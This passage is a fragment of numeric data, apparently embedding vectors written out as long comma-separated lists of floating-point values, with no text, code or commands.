2575,0.027769621,0.0077012894,0.00076659885,0.014273582,0.016006196,0.012883381,-0.008309954,-0.017655669,-0.00094653683,0.015123491,-0.0086223455,-0.010307754,-0.013778308,-0.012667089,-0.010175806,0.0087036975,-0.022077259,0.02764569,-0.013834287,-0.005745512,-0.008740419,-0.043108717,-0.014432537,0.010693991,-0.03829605,-0.0030076182,-0.015637508,-0.0064931847,0.017645728,0.0039599133,0.010103157,-0.022475941,-0.020353224,0.000010513599,0.0007297508,0.0072403504,0.007937787,0.01154595,0.011714052,-0.012045083,0.0019368557,0.011476437,0.01613214,0.0010794919,-0.010006201,0.050800852,0.0087042665,0.00084456714,-0.0046854927,0.0033012652,0.01781963,0.0236118,-0.016225891,0.021349855,0.015588487,0.01627931,0.01720879,0.0055321837,-0.0047938325,0.018128967,0.016946344,0.045611378,-0.004581846,-0.013047816,0.0012768147,0.009968421,0.014931107,0.011311997,0.014430441,0.011335279,-0.0153583465,0.009921326,-0.0060549085,0.0335081,0.017629145,-0.013248812,0.018074866,0.02750792,0.0010197093,-0.02516069,-0.012080698,-0.0056774816,-0.017244244,-0.0077065923,-0.026082337,-0.005582975,0.020796897,-0.011123269,0.022708738,0.012456153,-0.003633334,0.0149166845,-0.010039025,0.005087505,0.0029100103,0.0022317185,0.0013132484,-0.0023815671,-0.0062384075,-0.0054322653,0.003457811,0.013300312,-0.008247186,-0.013668955,0.011230885,0.012918327,-0.029101124,0.0043739127,-0.0028418184,-0.011205039,-0.0165952,0.00034332075,-0.000688654,0.012744561,-0.012048986,0.033102725,0.008583142,0.0023636792,0.0403477,0.016468601,-0.013616091,0.009065886,0.0044030435,0.028939739,-0.00079980213,0.015601484,-0.0043038805,-0.023650827,-0.018323114,-0.008975744,-0.011707096,-0.0025578788,-0.014809394,-0.015086307,0.016075125,-0.008826317,-0.017346056,0.035339966,-0.02976245,0.031139012,0.009375624,-0.02621411,0.010822406,0.018581303,0.015121075,0.001912863,-0.015411146,-0.0045663854,0.0043270844,-0.034196563,0.0010500161,-0.02138767,-0.0057071815,-0.008503278,-0.0041461904,-0.027212331,-0.015356999,0.000001709216,-0.016643388,-0.0010011356,0.01597586,-0.0354387,0.019210653,0.012988746,0.0011259047,0.0060520316,-0.015966116,0.00041154743,0.031002704,0.013444129,0.0010702459,-0.018605364,0.01788932,-0.020120952,0.022303771,0.0012047685,-0.02730499,0.005720312,0.0066192164,0.014951426,0.010487542,-0.03548396,0.0023512589,0.0058279103,0.008587078,-0.004744116,-0.027537532,0.02418485,-0.008508605,0.009688444,0.010404392,0.020552013,-0.0053049414,-0.010437698,0.01571304,-0.0039194417,-0.029215459,0.01094493,-0.024373386,-0.003065978,-0.013778616,-0.012818041,-0.0049770265,0.0002554826,-0.024977649,0.01760068,-0.019508542,0.000002435474,0.005994641,0.019534322,0.018935388,0.024452308,0.0023834526,0.015844801,-0.010051866,0.0107950745,-0.012975302,-0.00931233,-0.021347214,0.017419746,0.026275938,0.016398193,-0.008959314,0.0016322371,-0.0013633451,-0.031786393,0.024019225,0.03363601,-0.009240715,-0.012580236,0.018104522,0.0024484352,-0.022813464,-0.025831027,0.006022082,0.000012810777,0.0006962519,-0.0021571876,-0.016528992,-0.011708558,-0.014301839,-0.018216401,0.061819118,0.0031186896,-0.00065392477,-0.019369077,0.01712494,-0.007963008,0.026174424,0.0053090444,0.00068375916,-0.021444784,-0.04258789,-0.025811987,-0.0015286559,-0.016733522,0.0029733225,-0.004527287,0.00022371317,0.006181269,-0.010083347,0.012037974,-0.010661493,-0.0029801216,-0.005968355,-0.0070669563,0.005973637,0.0006827515,0.029002324,-0.015818244,0.0029180935,-0.0011012043,0.0066336645,-0.021108432,0.035622146,0.0131904725,0.0022806954,-0.0033170378,0.018736739,-0.022813663,-0.017090704,0.01233466,-0.0016833968,-0.031181473,0.029935373,0.002021027,0.004993774,-0.025898328,-0.0125376675,-0.0017182672,-0.008092847,-0.022292783,0.0020894818,-0.001887379,-0.0024162473,0.005154162,-0.009183324,0.019682651,0.00041435717,0.023683874,0.017696839,-0.016802698,0.005726566,0.014667041,0.014076249,-0.0019315665,-0.011632007,-0.010843554,0.0064037563,-0.010033427,0.010511943,-0.013559509,0.017934687,0.0015789593,0.0044135787,-0.005014207,0.015877016,0.0041634454,0.016927296,-0.024483632,0.0022853652,-0.008059615,-0.006444581,0.016406227,0.02647808,0.0021544995,-0.020180404,0.012866472,0.0053908345,-0.007438347,0.05112804,0.012804311,0.019953702,-0.010479541,0.007244532,0.0069931624,0.015307957,0.017143814,-0.0048997537,0.0014592198,-0.026032494,0.021891607,-0.00059082994,0.0025126154,0.02944939,-0.010494217,0.031521365,0.001065968,0.0023672027,-0.032413047,-0.008369651,0.02416122,0.02880728,0.010286102,0.0040879617,0.019470518,0.009610901,0.007835649,0.022473525,0.0020184119,-0.004343919,0.009357168,0.02270347,0.0054900562,-0.005439745,-0.05224786,-0.0029632736,0.10414469,0.007337898,-0.025451314,0.0361818,-0.0072501525,0.007737446,-0.07335456,0.007341836,-0.0074192854,-0.011377648,0.0047638305,-0.0089931935,-0.01186083,0.012798269,0.011928873,-0.0074820337,-0.0056496593,-0.005189541,0.011835404,-0.0113901105,-0.008189695,0.0030983854,-0.02216693,-0.0014969888,-0.050293382,0.00031332648,-0.002237186,0.0014289889,-0.008899712,-0.0205755,-0.008674587,-0.01457952,0.017959775,0.009194221,-0.03271902,0.02019935,0.010025797,0.032257367,0.004724675,0.026507901,0.026762003,0.009389717,-0.020370541,-0.037494443,-0.14121073,0.00034770204,0.009049622,-0.031366006,0.03480694,-0.026874484,-0.0016476265,-0.0052511347,0.0144956345,-0.027276048,0.009116845,0.013119853,-0.018284934,0.018744452,-0.032819476,0.005957265,-0.0068396414,0.0034529702,-0.0014031988,-0.010138807,0.016847799,0.0039773216,0.00083729235,-0.026925858,-0.036301155,0.01087397,-0.0007806304,0.0330609,-0.018883854,-0.00064099766,-0.00850995,0.026571075,-0.022867585,0.0052882684,0.007857303,-0.008806032,0.008232942,-0.0061071073,-0.016575623,0.018457292,-0.026837489,-0.003654528,-0.005751761,0.004332845,0.0014569603,-0.0023473066,0.01088129,0.017268939,0.009224989,-0.0060728,-0.00029985319,0.0031242417,-0.009562355,-0.0023811255,-0.013956423,-0.004109235,-0.005061884,-0.0019174418,-0.02306938,0.016313026,-0.017879263,-0.027522948,-0.000039826733,0.0011519283,0.04862495,-0.00992392,0.026298849,-0.020781038,0.006190144,0.0041921115,0.0026013106,0.010109874,0.011632083,-0.015793473,0.017759651,0.010713786,-0.019192576,-0.008257388,0.0384638,-0.008068176,0.012081118,-0.00031323516,0.013003288,-0.0051855226,0.023719108,-0.018817753,0.011213632,0.0021996123,0.0019150842,-0.02149766,0.03178721,-0.01295598,0.017901212,-0.00744966,0.010047455,0.007104993,0.037071493,-0.022969894,-0.024461508,0.016323697,-0.0028507526,-0.027998282,-0.016623992,-0.0003438515,-0.003467483,0.006597547,0.0020256296,-0.012484006,-0.014319813,-0.010150795,0.0029989097,-0.01238233,0.016675128,0.0027198528,-0.019605612,-0.017274914,0.013142565,-0.003989023,0.006176338,-0.0029168297,-0.027081862,0.02009333,-0.02135006,0.010791801,0.026997393,0.03424076,-0.0038790128,-0.0033060426,-0.015034639,0.011493316,-0.020712476,0.010186615,-0.011822036,0.014946476,-0.0061875167,-0.009560084,-0.0053680437,-0.0020980733,-0.024322543,-0.00025874563,0.0024057452,-0.0056922156,-0.00670353,0.0041041146,0.005717552,0.0028280881,0.04120692,-0.006619206,0.017389419,-0.0072496254,0.0040295175,0.020137703,-0.028199784,-0.047842365,0.01437176,0.06595333,-0.0076509425,-0.013771193,0.016396558,0.00010773715,-0.0049107173,0.019839903,-0.028227208,0.012663493,-0.02460297,-0.017023085,-0.0011367848,-0.006357346,0.0027062907,-0.018011138,0.023524,-0.0014251033,0.022125525,0.008010685,0.008502233,0.014504332,-0.015986426,-0.0020951198,0.005391077,-0.0025794643,0.01117772,0.013851657,-0.00019289558,0.0025584542,0.0021974144,-0.0025459118,-0.012016537,0.009497583,0.002129406,0.023028743,-0.02573788,0.0038025717,-0.008107854,-0.0104490705,-0.013343252,0.0011900971,0.0176497,0.007145531,-0.018303243,-0.014077769,-0.026422346,-0.01860401,-0.0007061783,0.0036527659,0.008962811,0.0025326372,0.009986231,0.003717692,-0.0024738682,0.009173014,-0.006636195,0.007932136,-0.0012634648,0.018363794,-0.01414547,0.00054278516,-0.010263825,-0.014715948,-0.01457407,-0.02637601,-0.004567531,-0.01406673,-0.0032361955,-0.0080184415,0.008365994,-0.013950456,0.02040647,-0.014149674,0.0041214456,-0.0042548883,0.0011654249,-0.005334924,-0.012788073,-0.016566055,0.009890734,0.0026800123,0.028027471,-0.0015197069,-0.0004310487,0.0016499757,-0.039831873,-0.0003221343,0.024124373,-0.031489097,0.009493034,0.00094337267,-0.009690154,0.028865194,-0.0063780253,0.0237231,0.01593434,0.010641245,0.013632708,0.026410902,-0.010724056,0.013801919,0.004481302,0.0057723834,-0.033639107,-0.009512155,-0.015160016,0.014115338,0.00025608175,0.0064864806,-0.00012600407,0.004909161,-0.01100765,0.009565341,-0.03006855,-0.010619759,0.0277062,-0.017563578,-0.011148435,0.018547239,0.00020279519,-0.0025442778,-0.02195167,0.009479699,-0.015797008,0.026412351,-0.027347565,0.00524324,0.013811315,-0.030588951,0.009940098,-0.0035122081,0.034276616,-0.0009498734,-0.007145394,-0.021481866,-0.0045073456,-0.0009200829,0.027289977,0.0042723413,0.032150593,-0.020124847,-0.019845432,0.0059019853,-0.0016121046,-0.012481218,0.0012609911,0.0065135695,0.013747306,-0.0044861217,0.0020548215,-0.014830519,0.0119702155,-0.009023345,0.001579977,0.0035784517,0.018556178,-0.015439158,-0.020660203,-0.021580348,-0.009963737,0.0035788356,0.021211613,0.012128311,-0.00461021,-0.006276621,0.02818135,0.033476263,-0.0072978577,0.021439794,0.0013156881,-0.010748882,-0.0056022042,0.0032138731,-0.01103627,-0.0006835288,-0.0018608796,0.0020762119,0.0290422,0.0075550945,-0.008273013,0.023117417,0.014445868,-0.0067436392,-0.0014054176,-0.014229268,0.015398493,-0.0027067044,0.02744883,0.0011228623,-0.0077221035,-0.0078323325,-0.022428155,-0.021353832,-0.0023283912,-0.011395629,0.0031215488,0.0156141035,-0.019921608,0.011395466,0.013873401,0.007006702,0.031580087,-0.02278026,-0.003976291,-0.007423965,-0.009157405,0.012840177,-0.023913225,-0.0000059055783,-0.0024043873,-0.009088139,-0.017675055,-0.017454004,0.019639501,-0.029915912,-0.026532613,0.0016293613,0.02212063,0.0030728972,-0.026616517,0.013046765,-0.0011910588,-0.0039628455,-0.0043643084,0.007070115,-0.0067888163,-0.019863905,0.060312644,-0.008504716,-0.020386169,-0.0025461472,0.017252168,0.016500643,-0.011775493,0.007863234,-0.015330197,-0.0035567463,0.009842563,-0.029531693,0.0074150166,0.0025783512,-0.026663065,-0.017944723,0.00843631,-0.009526893,-0.019416312,-0.005461105,0.029598398,-0.008101402,0.007665311,-0.00665637,-0.007956815,-0.038389336,-0.00090162345,0.029488388,-0.015160366,0.017888373,0.016012134,-0.017050564,-0.021605207,0.011863748,-0.0144211445,0.006647543,0.0069615045,0.015763352,0.015237623,-0.002117114,0.038662203,0.008870957,0.012263719,0.01921339,-0.011238846,-0.013568882,0.005491242,0.00565064,-0.005963668,-0.003019819,-0.015482739,0.010345216,0.0391781,0.0064564273,-0.020222617,0.019649312,0.017752541,-0.01341097,-0.014657814,-0.00048074324,0.033802822,-0.0030490293,-0.035323363,-0.02124639,0.009508146,0.019894226,-0.031537708,-0.010300378,0.0023545292,-0.011345376,0.0036775852,0.008679599,0.0047055273,0.01629377,-0.005616058,-0.016513098,0.025343565,0.009925736,0.0076709776,0.023384882,-0.013367151,-0.0067891763,0.0034324448,-0.0097956285,0.018212933,0.010630374,0.00592694,0.015104623,-0.005212572,0.006521766,0.02783588,-0.019175084,0.02230541,0.006236451,-0.028168773,0.0017258357,-0.000023034638,-0.030012917,-0.00043282792,-0.028748823,-0.014178543,0.0020563223,-0.012421075,-0.0044638086,-0.0049017123,0.015533373,-0.091903806,0.005089121,-0.02597663,-0.00001317333,-0.010101265,-0.01933842,0.00038660815,0.021271612,-0.005442315,-0.023408009,-0.013035261,0.022914741,-0.004920521,-0.0135627845,-0.0038999105,0.0012514878,-0.022036092,0.009650687,-0.0038042173,0.013793658,0.0234743,-0.015748654,0.00067469623,-0.008029382,0.0016529292,0.007221949,-0.003534862,0.022639368,0.011997399,0.020881254,-0.010748448,-0.00431458,0.008020335,0.021512821,0.015374193,-0.002011671,0.0074837157,-0.00469429,-0.008390471,0.027409395,0.0032211535,-0.0019462827,0.01850718,0.0049449583,0.031904433,0.016778816,0.00048613493,0.017967248,0.020348046,0.02042009,-0.036470287,0.0006764936,0.00922277,0.0016759397,-0.0029539603,-0.016730316,0.006715385,-0.010163397,0.009334821,0.000013921681,-0.025575982,0.007639801,0.0017997642,-0.010842956,0.010746189,0.016835324,0.00064305746,-0.022920264,-0.015322128,0.018744314,-0.0044352957,0.01702032,0.0006435086,-0.0013464997,-0.009502164,0.016935494,0.02553431,-0.017523767,-0.0026935863,0.014723965,-0.031974085,-0.000019723784,0.008927337,0.004129635,0.017083257,0.005263629,0.0046642264,0.019762976,-0.0052482197,-0.016556125,0.013451374,0.013357531,-0.00986837,-0.0017692185,-0.01318923,0.009284477,-0.0084063355,0.031359423,-0.013968798,-0.020724526,-0.0050959443,-0.012341425,-0.0117415255,-0.029283956,-0.07975619,-0.015091248,0.008649834,0.0011747292,-0.009193996,0.0035140142,0.005925836,0.0074659167,0.041214738,-0.0019293124,-0.01061658,-0.017204149,-0.025550583,0.010419274,0.0059234123,0.014745297,-0.03616047,-0.012452279,0.02582682,-0.011667004,0.0012901302,-0.0037469543,-0.017948769,0.013225707,0.0008078109,0.017771423,0.0020672553,0.047235966,0.035763357,-0.0015170434,0.00065710495,-0.004616373,-0.02355152,-0.006322676,-0.03728906,0.0030626454,0.00066794234,-0.0074671702,0.009487109,0.008232009,0.0029606347,-0.00045240877,0.0122369025,0.02322618,-0.025513215,-0.009175095,-0.015283081,0.017508281,-0.020254059,0.009906973,-0.0052123023,0.0010934741,-0.014597883,-0.01712934,-0.03572622,-0.010817982,-0.013090035,0.006112625,-0.01603931,0.008455535,-0.0042336765,-0.0021089702,-0.012934358,0.017256513,-0.0115313195,0.028825404,-0.00296402,-0.004676935,-0.0020669233,0.026005194,0.00012294276,0.009307715,0.009690768,-0.011427802,0.022497248,-0.0032226243,0.022962317,0.024107654,0.005656897,0.012833695,-0.005030126,-0.034141608,0.006219304,0.012450204,-0.04078092,-0.0013775752,0.016127015,0.015783165,-0.012485342,-0.022686543,-0.0113333585,0.01871875,-0.017880008,0.028229913,0.029487565,0.024046877,0.058777124,-0.012190482,0.0024538774,-0.0134570245,-0.015120307,0.0022524544,0.0019650569,0.008546135,-0.021760074,0.018449722,0.03850933,-0.02842301,0.0044917767,-0.007196866,0.01963564,0.025541779,-0.018549088,0.0064500323,0.012097312,0.01832047,0.009514079,0.002641608,0.0050478717,-0.020605914,-0.011122118,0.023524554,0.0148365395,-0.01624438,0.014458365,-0.0036838762,-0.01637485,0.012393525,-0.005046307,-0.019422822,-0.0075430237,-0.006695607,0.018863717,0.0085887555,-0.008438815,0.0069471905,-0.015080108,0.021048764,0.019496629,0.021188268,-0.008043361,-0.0009290753,-0.003334013,-0.006566944,0.009590846,-0.00010651967,0.0020664574,-0.020475058,-0.012703813,0.014201657,0.002699098,-0.002941962,0.020488156,-0.0023830873,-0.0010303796,0.013864411,-0.006007582,0.017885158,-0.006410242,0.013582481,-0.010864187,0.020386308,0.011967404,0.0017946053,0.011038223,0.0013835732,-0.005036591,-0.0028126906,-0.008395293,0.013880376,-0.011885993,-0.0091860015,0.01172422,-0.06537867,0.0010787238,-0.0035371785,0.032641377,0.0117644705,-0.0000020392524,0.014103039,-0.03510298,-0.0016502581,-0.018793909,-0.005554617,0.017433695,0.016389985,-0.0018014801,-0.017632922,0.0026592321,0.018579407,0.02628202,0.015599551,-0.010422665,-0.017525552,0.020964503,0.008198628,0.0033426934,-0.011489283,-0.0014001125,-0.003911912,-0.027379084,0.0053667156,0.0015098461,-0.010745827,0.012195255,0.0071490225,0.002856405,0.018800478,0.0008509805,-0.01924605,-0.012647133,0.040603902,-0.01875226,-0.0143843135,0.0063179466,0.014596632,-0.003386431,-0.02813353,0.011429463,-0.005307078,-0.019098425,0.0043786718,0.018454447,-0.009207542,-0.00018132823,0.03931503,0.025685018,0.017466415,-0.013190907,-0.02179889,-0.0035033044,0.0056317234,-0.02766065,-0.007924039,-0.009303277,-0.007494988,0.025790542,-0.000030270554,0.013309674,0.0056266957,0.021166192,-0.0004044485,0.032369148,0.023925684,0.03817891,-0.0050864294,-0.0072974907,-0.016126819,0.026584556,0.04625816,0.0006828347,-0.013387595,-0.009841564,-0.0077939187,0.00037406984,-0.00647363,-0.0014389491,0.004591409,-0.017938456,0.018928876,-0.02820608,-0.0030342895,-0.01764945,-0.0014190234,-0.013552034,0.0064260443,0.008932953,-0.007272472,-0.0014203282,-0.005619952,-0.003739423,0.0030445626,-0.0015247542,0.00838223,-0.031534698,-0.015100683,0.0170722,-0.013208729,0.015515852,0.016881114,-0.00953467,-0.018114056,-0.007478613,0.017364774,-0.01312391,0.012492169,0.011000559,0.015442228,0.0306595,0.010792736,0.011953542,-0.018475056,-0.0046408833,-0.012387214,0.0049531525,0.016864557,0.015930679,-0.0014683368,-0.008717681,0.013361785,0.031856906,-0.035643198,-0.009046793,-0.006071658,0.007515021,-0.0077307136,-0.013923779,0.017600417,-0.0032328982,-0.008701401,-0.0139745725,0.024771748,-0.02374619,0.022571854,0.008207702,-0.004388443,-0.017329799,0.016540632,-0.021275261,-0.0055918256,-0.018593304,-0.031466607,0.024133474,-0.022185871,-0.0012605379,-0.011182771,0.0032876912,0.049836982,0.004821843,-0.008082674,0.023738228,0.0031818368,-0.017513061,0.0005059545,0.015327733,-0.005580269,0.014166153,0.033759363,-0.012029446,0.0066683036,-0.0010813039,0.011206661,0.021256326,-0.025052777,0.02349676,0.020722955,0.0033784693,0.010496834,-0.023628185,-0.010474017,0.025730755,0.0046642055,0.0056986436,-0.010593901,-0.0264803,0.025244296,-0.039358474,0.0019492506,0.016470782,-0.010006689,-0.0062721516,0.01481051,-0.01786374,-0.008505687,0.0035791087,-0.012750904,-0.032048993,0.028068516,-0.021070058,-0.0028493672,-0.005305945,0.013490162,-0.016657047,-0.027145285,-0.016270522,-0.09121121,0.017010566,0.00272369,0.00990287,0.03980415,0.008672463,-0.0017124931,-0.01740096,-0.008070661,0.010166428,-0.017184122,-0.015499338,0.00018739044,0.02184297,0.03635246,-0.028034937,-0.0135607775,-0.009627396,-0.0017366989,-0.028785814,0.0072359643,-0.0035110374,-0.005601599,0.00024112822,0.0287732,0.021298807,-0.006774015,-0.017560977,0.008982817,-0.0069865934,0.01296189,0.0051395637,0.013785715,-0.000180284,-0.017900495,0.022521002,-0.0087038,0.019014837,0.017211655,-0.02543493,0.015919682,-0.00019133356,0.0013418135,0.0023226119,-0.024709169,0.01833676,-0.014266358,0.004907033,0.0068408847,-0.0028525235,-0.017431105,0.013826625,-0.013272424,0.030045917,0.00806725,0.0009622962,0.017977012,-0.009196324,0.029283673,0.0021719022,-0.0066426154,0.008579784,0.00055784336,0.0036231743,-0.008883371,0.0077752676,-0.0032664563,0.021845562,-0.007739285,0.009864992,0.03066941,-0.012433286,0.019856542,-0.004364036,-0.008359634,0.009917952,-0.00005772643,-0.017379643,-0.022763517,-0.008489318,0.046492852,-0.005158796,0.030885054,-0.00275353,-0.004131246,0.004516485,0.0050688684,-0.009132434,0.0017022826,-0.011748571,-0.01873303,-0.00977115,0.0218026,-0.010339966,0.00012583399,0.0036089974,0.0016551381,0.003840506,-0.0071118483,0.0067332066,-0.003670346,0.006400691,-0.0003185603,-0.0046933754,0.0058715725,-0.019227382,-0.012803511,-0.009241099,-0.0145886475,0.0067070606,0.0018316675,0.030747373,0.0259775,0.031815533,0.0070481403,0.029293027,-0.015958706,0.01835074,-0.0010782242,-0.021079898,-0.009138317,-0.006865581,-0.024619862,0.04115306,0.022328572,0.0036822455,0.013745425,-0.0050929175,-0.0011927487,0.0093918415,-0.012411174,0.027690852,0.012165782,0.018549256,-0.021491375,0.0005793497,-0.00073213154,0.035375737,0.0023364918,0.015919546,0.008674792,0.0017539243,0.011059903,-0.0023494791,-0.026869273,0.01713931,-0.011042952,0.010505626,0.0041411105,-0.038009938,-0.027610354,0.0070126555,-0.0064338166,0.007934161,-0.0035222578,0.016945783,0.0014099297,0.01242296,-0.016455555,-0.016390901,-0.0047336128,0.018877482,0.0046641924,-0.015732318,-0.02363113,-0.0028828897,0.015865207,0.0028272374,-0.015112978,0.000466549,-0.019141339,-0.011097958,-0.00074845715,-0.0057112994,-0.022248056,-0.005935992,0.039323613,0.03037095,-0.02341327,0.0143014025,-0.005251055,0.0021112813,0.0015107588,-0.0047275354,-0.014231819,-0.017936116,0.0029841813,0.0018532715,0.02235677,0.002479338,0.00029129276,-0.0060974574,-0.0070177997,0.0036548758,0.015487806,-0.0060762633,-0.0065640993,-0.016548978,-0.0018957491,0.011884322,-0.017509818,0.019432742,-0.005411367,0.015835548,0.043719243,-0.0016190378,-0.012353522,0.018747235,-0.016453367,-0.00027475558,-0.0037932189,0.007364039,0.025197087,0.12452898,0.0042296103,0.013469112,-0.007045329,-0.0027761955,-0.001182742,-0.00048295784,-0.0151804695,0.0043687886,0.0063299784,0.019160362,-0.0012006598,0.004367883,-0.003527734,-0.005537195,0.026617046,0.00986489,-0.035979513,0.0312636,0.01071847,0.017352398,-0.012616794,-0.003862146,-0.059129722,0.004572032,-0.07339194,0.023061953,0.026404122,-0.0049923467,0.03666139,0.006544193,0.005198731,0.03356388,0.002808318,-0.0016517976,0.018315112,0.0047667488,-0.009631433,-0.0043475595,-0.004114624,0.01908552,0.0034813252,-0.0065446626,-0.020171326,-0.013827804,-0.014912219,0.0024248473,-0.022851946,-0.0040476792,-0.0068854103,0.011972915,0.0018418324,0.016769873,-0.0022004528,0.031480156,-0.010564813,0.0035406481,-0.0061379527,0.016395042,-0.003672792,0.0004567817,0.0058886376,0.007015393,-0.008618314,0.006848224,0.0076997136,0.0043620802,0.0012790574,-0.0042755813,0.00591585,0.026382973,0.0069216248,-0.0043904264,0.0055335592,0.016848642,0.017737716,-0.013602443,-0.006439001,-0.0030892817,0.0041258186,-0.0029701,0.0082908245,0.026072662,0.018960623,-0.005837166,0.013026449,-0.022421712,0.033557467,-0.0061152144,-0.010540871,-0.014910765,0.018770847,0.015133364,0.013769293,-0.012375749,0.010828119,0.025150185,-0.0041982713,-0.009836644,0.01224107,-0.0125857685,-0.0053462856,-0.0056736916,0.008308318,0.0076938,0.0019234264,0.003321487,0.006840215,-0.017875686,0.016099535,-0.006615522,-0.003953874,-0.014353007,-0.0026771578,0.010670325,0.043546982,-0.017192172,-0.008871866,0.023786308,-0.016974052,-0.0040401965,0.014493461,0.0052954536,0.03885993,0.034375057,0.010988552,-0.022233091,0.0045364816,-0.0042225355,0.0015311679,-0.00044977994,-0.03601752,0.004642941,0.032848444,-0.011106687,0.020967426,0.035838213,-0.0006776156,0.020377958,-0.011630373,0.006213044,-0.0057173357,0.008012506,-0.007861652,0.030555557,-0.013469247,0.03906011,0.016790338,-0.0048427507,0.024729408,0.007870561,0.018147971,-0.020051083,-0.022719506,-0.026299866,-0.0071501452,-0.026446879,0.0059850067,-0.011758614,-0.008074906,0.031250052,0.011816658,0.02018824,-0.048588045,0.002497604,0.016827157,0.012768548,0.0091605075,0.015664203,0.015993953,-0.008762388,-0.005069628,0.013364912,0.013305024,-0.02315819,0.018654507,0.009327283,0.019794008,0.007963652,0.0065746563,0.0073327455,0.021284558,-0.013369566,-0.006900879,0.030557547,-0.005817247,0.010874268,0.019401252,-0.02101821,0.020802885,0.0054850667,-0.0026228612,-0.0031037938,0.009180792,0.0011149066,-0.001544084,-0.023640253,0.034470644,-0.044494953,-0.026901279,-0.013796699,0.00952417,0.01900583,-0.0055802595,0.008971476,-0.010756893,-0.0019010586,-0.023307605,0.004666973,-0.019366244,0.009192544,0.0012887697,-0.0002252699,-0.044018097,0.003999824,0.0037940983,-0.0039035634,-0.023033513,-0.013738041,-0.013598107,0.016516399,0.000350505,-0.0086424975,0.012146753,-0.019810256,-0.007045884,-0.01958018,0.008604461,0.0069176997,-0.046490133,-0.022565287,-0.0011266829,-0.010423449,-0.003871733,-0.007851573,-0.0026812218,0.016402576,0.0018641859,-0.0053734374,0.017505812,-0.0054255337,0.0074277027,0.014952858,0.002230084,-0.027748672,0.00875768,-0.0013175578,-0.0052725314,0.011231366,-0.021226525,-0.032631774,0.0008429438,-0.012523123,-0.028616363,-0.02370198,-0.028564626,0.0011456897,0.02554206,0.013159003,-0.014996436,0.014360668,0.01515222,0.0021624682,0.016926225,0.0043708645,-0.019290961,0.0082741855,-0.0056913733,-0.018630704,-0.0067570745,-0.010019099,0.015702404,-0.0093209,0.017238699,-0.006467293,0.011359036,0.0012301566,0.003980894,-0.004942573,-0.007666331,0.0021992351,-0.02433496,-0.008079459,-0.007407806,0.0019186378,-0.009080794,-0.0013694122,-0.006562572,0.049295936,-0.053933192,0.0014640387,0.030395525,-0.0122217275,-0.044266336,0.015686719,0.009950445,-0.024379037,-0.021311939,0.017926345,0.012265983,0.0038630173,-0.02503289,-0.011893257,0.001981249,-0.02002609,0.018289655,0.012290717,-0.02495427,-0.008567478,0.0025595056,-0.008096116,-0.00040058407,-0.030306812,0.0021338672,-0.016401812,0.00025641793,-0.0052349577,-0.021323854,0.003220761,0.009103685,0.01727828,-0.010625524,0.006088391,0.011883625,-0.005511502,0.0076372777,0.0021885573,-0.0076843183,-0.019154456,-0.011263829,-0.0005262646,-0.023877768,-0.010002382,-0.024814455,-0.006207434,0.011678437,-0.007530569,0.11964064,-0.01968895,0.0069990465,-0.001073132,-0.003859785,-0.022162857,0.016419325,0.027120903,0.0075343703,0.015772574,0.005447241,0.014610429,-0.0025721919,0.02328648,-0.012013934,0.0070813084,-0.0036793607,0.15505457,0.0004399139,0.031329073,-0.0021041709,-0.0026679372,-0.0021748901,0.0032717392,-0.0017850337,-0.08131677,-0.011534863,-0.026122952,0.0039509046,-0.014498114,-0.0387803,0.035493955,-0.0114136115,0.0061308183,0.0068745418,0.010950731,0.007455867,0.0033885217,-0.02590237,0.00075348135,0.017455542,-0.013820054,-0.02164719,-0.018129745,-0.01853328,0.010697397,-0.012683362,0.0029804206,0.0068781483,0.021889377,0.0062453034,-0.013507443,0.0038729846,0.0042019836,0.0092379935,0.0058412165,0.016687753,-0.0073705446,-0.030975234,0.02516304,-0.016422179,0.014663109,-0.0072224173,0.03183894,-0.014176325,-0.0067795995,-0.024004612,0.010712549,0.01903345,0.020241877,-0.0011697271,0.005645149,-0.001066411,-0.010277569,0.04143299,0.00805132,-0.008083804,-0.0030011605,0.019747742,0.0022936834,0.013201018,0.008961603,-0.018628996,-0.00656255,0.01790678,0.016260913,-0.010989944,0.018695258,0.019710395,-0.0054749046,-0.00032520466,0.0038611884,-0.00078146154,0.009665079,0.0055486513,0.02524453,0.012417534,-0.008862651,0.0045266766,-0.013365859,-0.0024698519,0.035533987,-0.01541156,0.013961254,0.0052302214,0.005655813,-0.01812024,-0.03203437,-0.0020616732,0.00095874816,-0.009273338,0.0010100345,-0.013184751,0.015828906,-0.003830288,-0.0050134454,-0.009068533,-0.0021954495,-0.038587894,-0.0029999847,-0.0008859265,-0.00348589,0.0031909163,0.007001486,-0.015658226,0.015641361,0.03833554,0.011365114,0.0026507392,0.00036857132,-0.011947944,0.0038011584,0.012290555,0.07418263,0.0022424576,-0.014616149,0.0063223727,-0.041283097,-0.044750158,-0.0076975804,0.0204304,0.0014506717,0.0062696724,0.0024283668,-0.013875185,-0.011376499,0.013483442,-0.004886315],[0.015780106,-0.011227438,-0.020764878,-0.021762079,0.015455334,-0.02271527,0.0047487225,0.02193962,0.0052154474,-0.013345322,0.0027346073,0.01908201,-0.0019433615,0.0034518791,-0.0025516832,0.01638216,-0.010308286,-0.006580145,-0.004419828,-0.028809616,-0.00044418086,0.0063777105,0.019488748,-0.00071764295,0.0022270498,0.0035790638,-0.0028921722,0.02062316,0.023504734,-0.00031720384,-0.0036414082,0.017099435,-0.011532711,-0.0005349799,0.020176142,0.0001612748,-0.011656469,-0.02126313,0.01956031,0.0012950569,-0.003273628,0.020759331,-0.0042996733,0.022900356,-0.0014185923,-0.009503971,-0.0084425565,-0.00005557182,-0.037371434,0.014722357,0.016678687,0.002983303,-0.05345767,0.022212656,-0.020205518,0.011035555,0.008127996,-0.021292375,0.01047582,-0.015571446,-0.011874966,0.010118723,0.016018044,-0.025536085,0.020809403,-0.000009334009,-0.016403254,-0.041670453,0.006569273,-0.0087888725,0.0057479693,0.004705581,0.004401488,0.00614925,0.02130523,0.014552568,-0.0019757233,-0.015592728,-0.013038289,0.013963669,-0.026763929,0.0030034361,-0.010299758,-0.007219744,0.014207854,0.02745263,0.0023491783,0.0058155656,-0.00453364,-0.023831781,-0.0044891625,0.00033981123,0.014600165,0.0004565577,0.0024808806,0.023746949,-0.011443388,-0.021471173,-0.00847298,0.011985155,-0.004534697,-0.01449341,-0.018598987,0.013438576,-0.007222285,-0.017525118,0.00404839,-0.0009300391,-0.005534505,0.007884437,0.008808262,0.008279794,0.002931329,0.0060757725,-0.019966142,-0.008182573,-0.008561184,0.010789075,0.0027273318,0.011593766,0.0071612815,0.014676952,0.007745648,-0.0031815476,-0.03355202,0.004039828,-0.010060376,0.028473051,-0.0059753447,0.0066715595,-0.008407754,0.008873352,-0.01